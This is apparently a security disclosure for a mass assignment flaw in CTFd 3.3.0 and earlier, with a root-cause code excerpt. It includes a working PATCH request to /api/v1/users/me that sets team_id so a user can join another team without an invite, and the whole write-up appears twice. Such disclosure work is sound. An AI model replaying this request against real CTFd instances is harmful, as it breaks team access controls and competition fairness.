pich4ya/ctfd_330_exploit.txt

## ctfd_330_exploit.txt
@author Pichaya Morimoto (p.morimoto@sth.sh)

Vulnerability: Broken Access Control/Mass Assignment Vulnerability in CTFd <= 3.3.0
CVE: n/a

Impact:
- Join CTF teams without knowing the team password or having a team invite
- Can switch to another team, and switch back to the old team

Attack Scenario:
An attacker can join other teams to:
- View hint without losing point (if set)
- Make incorrect submission attempts until reaching the max attempt (if set)

Root Cause Analysis:

It is a classic Broken Access Control/Mass Assignment Vulnerability, where an attacker can set team_id in the user input field.
The CTFd tries to overwrite certain fields (id, oauth_id, and created), but not the team_id !

https://github.com/CTFd/CTFd/blob/8de9819bd45be7483f252d37d0d0a2977dd7bd6d/CTFd/schemas/users.py#L19

class UserSchema(ma.ModelSchema):
    class Meta:
        model = Users
        include_fk = True
        dump_only = ("id", "oauth_id", "created")


Steps to reproduce:

1. Log in as a valid user in CTFd
2. Call https://ctfd/api/v1/teams to view target's team ID
3. Add/Change Team ID

PATCH /api/v1/users/me HTTP/2
Host: [DEDUCTED]
Cookie: session=[DEDUCTED]
Content-Length: 84
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json
Content-Type: application/json
Csrf-Token: [DEDUCTED]
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://[DEDUCTED]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[DEDUCTED]/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"name":"sthpentest","email":"p.morimoto@sth.sh","country":"TH", "team_id":1337,"fields":[]}
	@author Pichaya Morimoto (p.morimoto@sth.sh)

	Vulnerability: Broken Access Control/Mass Assignment Vulnerability in CTFd <= 3.3.0
	CVE: n/a

	Impact:
	- Join CTF teams without knowing the team password or having a team invite
	- Can switch to another team, and switch back to the old team

	Attack Scenario:
	An attacker can join other teams to:
	- View hint without losing point (if set)
	- Make incorrect submission attempts until reaching the max attempt (if set)

	Root Cause Analysis:

	It is a classic Broken Access Control/Mass Assignment Vulnerability, where an attacker can set team_id in the user input field.
	The CTFd tries to overwrite certain fields (id, oauth_id, and created), but not the team_id !

	https://github.com/CTFd/CTFd/blob/8de9819bd45be7483f252d37d0d0a2977dd7bd6d/CTFd/schemas/users.py#L19

	class UserSchema(ma.ModelSchema):
	class Meta:
	model = Users
	include_fk = True
	dump_only = ("id", "oauth_id", "created")



	Steps to reproduce:

	1. Log in as a valid user in CTFd
	2. Call https://ctfd/api/v1/teams to view target's team ID
	3. Add/Change Team ID

	PATCH /api/v1/users/me HTTP/2
	Host: [DEDUCTED]
	Cookie: session=[DEDUCTED]
	Content-Length: 84
	Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
	Accept: application/json
	Content-Type: application/json
	Csrf-Token: [DEDUCTED]
	Sec-Ch-Ua-Mobile: ?0
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
	Sec-Ch-Ua-Platform: "macOS"
	Origin: https://[DEDUCTED]
	Sec-Fetch-Site: same-origin
	Sec-Fetch-Mode: cors
	Sec-Fetch-Dest: empty
	Referer: https://[DEDUCTED]/settings
	Accept-Encoding: gzip, deflate
	Accept-Language: en-US,en;q=0.9

	{"name":"sthpentest","email":"p.morimoto@sth.sh","country":"TH", "team_id":1337,"fields":[]}